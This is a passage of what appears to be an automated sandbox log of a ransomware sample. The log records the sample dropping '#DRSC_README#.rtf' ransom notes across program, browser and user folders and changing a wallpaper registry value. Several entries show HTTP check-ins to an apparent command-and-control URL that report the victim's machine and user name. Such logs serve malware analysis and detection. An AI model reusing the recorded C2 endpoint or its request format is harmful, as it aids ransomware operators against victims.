710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\default_apps\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\si\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre7\lib\zi\Antarctica\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\lua\meta\reader\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\bn\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\Links\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\Favorites\Links for United States\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\G9Q5MRQ4\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Optional\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\gl\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2ulz21c5.default-release\storage\default\moz-extension+++355a24d0-6cfc-4451-9595-11d186f69ab7^userContextId=4294967295\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0000863F\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\UBDEWKGM\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ach\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\0V5SICB9\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\META-INF\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2ulz21c5.default-release\storage\permanent\chrome\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre7\lib\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\Media Player\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ks_IN\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre7\lib\zi\Africa\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\uz\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Public\Pictures\Sample Pictures\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\SPPlugins\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\vi\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe HTTP URL 6 http://sec.timerz.org/addrecord.php?apikey=drsc_api_key&compuser=ELJKIHEZ|Admin&sid=oBmyzS1XOfT4SR34&phase=[ALL]49E80ECBA8F3CD9C Process not Found File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre7\lib\cmm\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Mozilla Firefox\browser\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\br\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\zu\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\lua\http\dialogs\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\Documents\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-403932158-3302036622-1224131197-1000\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\include\win32\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\lua\http\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\fur\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Adobe\Color\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\mk\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2ulz21c5.default-release\storage\default\moz-extension+++355a24d0-6cfc-4451-9595-11d186f69ab7^userContextId=4294967295\idb\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\etc\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Mozilla Firefox\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\cgg\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\ProgramData\Package Cache\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}v12.0.40660\packages\vcRuntimeAdditional_amd64\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre7\lib\zi\Indian\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\he\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ka\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe Set value (str) \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000\Control Panel\Desktop\TileWallpaper = "0" reg.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre7\lib\zi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Google\Chrome\Application\SetupMetrics\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\gu\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\tl\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\lg\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Installer\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Google\Update\1.3.35.452\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\el\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\include\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre7\lib\security\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\mai\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Public\Desktop\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Roaming\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\be\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\plugins\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\hu\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe HTTP URL 7 http://sec.timerz.org/addrecord.php?apikey=drsc_api_key&compuser=ELJKIHEZ|Admin&sid=oBmyzS1XOfT4SR34&phase=49E80ECBA8F3CD9C|3357|1GB Process not Found File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\html\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre7\lib\jfr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.zh_CN_5.5.0.165303\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre7\lib\zi\America\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Google\Chrome\Application\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ga\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\lua\http\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre7\lib\management\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\fa\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\84.0.4147.89\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Session Storage\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe HTTP URL 3 http://sec.timerz.org/addrecord.php?apikey=drsc_api_key&compuser=ELJKIHEZ|Admin&sid=oBmyzS1XOfT4SR34&phase=START Process not Found File created C:\Program Files\VideoLAN\VLC\locale\sr\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Code Cache\js\index-dir\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre7\lib\ext\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\mr\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\tr\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\vcRuntimeAdditional_amd64\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ps\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\skins\fonts\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Mozilla Maintenance Service\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Platform Notifications\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\id\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ms\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Crash Reports\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre7\lib\amd64\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre7\lib\zi\Etc\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\an\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\Desktop\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\amd64\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Platform Notifications\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe HTTP URL 11 http://sec.timerz.org/addrecord.php?apikey=drsc_api_key&compuser=ELJKIHEZ|Admin&sid=oBmyzS1XOfT4SR34&phase=FINISH Process not Found File created C:\Program Files\Java\jdk1.7.0_80\bin\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ru\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\bn_IN\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Public\Libraries\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program 